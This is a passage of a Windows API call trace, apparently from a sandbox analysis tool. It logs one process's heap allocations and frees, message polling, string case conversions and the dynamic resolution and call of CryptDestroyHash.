[0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.546] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.546] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.546] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.546] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.546] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e30 [0188.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.548] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.548] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0188.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.551] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: 